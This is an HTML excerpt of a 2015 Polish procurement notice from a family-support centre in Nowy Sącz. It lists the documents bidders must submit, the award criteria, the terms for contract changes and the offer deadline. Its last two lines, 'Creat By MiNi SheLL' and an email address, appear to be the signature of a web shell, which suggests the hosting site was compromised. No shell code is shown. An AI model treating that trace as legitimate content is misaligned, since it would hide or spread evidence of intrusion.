<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych -wg załącznik nr 2 do SIWZ. (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie).
 2. Wykazu wykonanych zamówień, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia (o którym mowa w pkt 8.2 SIWZ) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie - z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz dokumenty - referencje, poświadczenie, zaświadczenie itp. - zgodnie z regulacją rozporządzenia R.M. z dnia 19 luty 2013 r. w sprawie rodzajów dokumentów.(Dz. U. 2013r. poz.231), że te usługi były wykonane lub są wykonywane należycie.- załącznik nr 4 do SIWZ (każda usługa winna być wymieniona osobno) (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty te składa przynajmniej jeden z nich).w/g załącznika nr 4 do SIWZ oraz wykazu osób uczestniczących w realizacji zamówienia wg załącznika nr 5 do SIWZ (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaz ten składa przynajmniej jeden z nich).
3. Dokumentów np. referencji , poświadczenie, oświadczenie itp. - dokumenty zgodne z regulacją rozporządzenia R.M. z dnia 19 luty 2013 r. w sprawie rodzajów dokumentów.(Dz. U. 2013r. poz.231),potwierdzające, że te usługi były wykonane lub są wykonywane należycie.  tj. dokumenty potwierdzające, że zamówienia wskazane w wykazie, o którym mowa w pkt 2., zostały wykonane należycie 
 potwierdzających, że zamówienia wskazane w wykazie, o którym mowa w pkt 2., zostały wykonane należycie (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty te składa przynajmniej jeden z nich).
3) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia - załącznik nr 5 do SIWZ. -  tzw. Informację  potwierdzającą wykształcenie i CV zawodowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności faktury - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą w szczególności terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, jak i dotyczyć mogą ustalenia ostatecznej wysokości należnego wynagrodzenia, w przypadku zmniejszenia liczby uczestników zajęć w stosunku do zapisów specyfikacji. Dopuszczone zmiany umowy j.w., zostaną wprowadzone w drodze aneksu do umowy. 
Istotne zmiany postanowień umowy mogą także wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, 
ul. Kilińskiego 72 A, 
33-300 Nowy Sącz
TEL: (18) 443 82 51, FAX (18) 444 27 17,
e-mail: pcprnskadry@op.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2015 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, ul. Kilińskiego 72 A, 33-300 Nowy Sącz, sekretariat pok. Nr 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach Projektu pn W stronę samodzielności i niezależności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com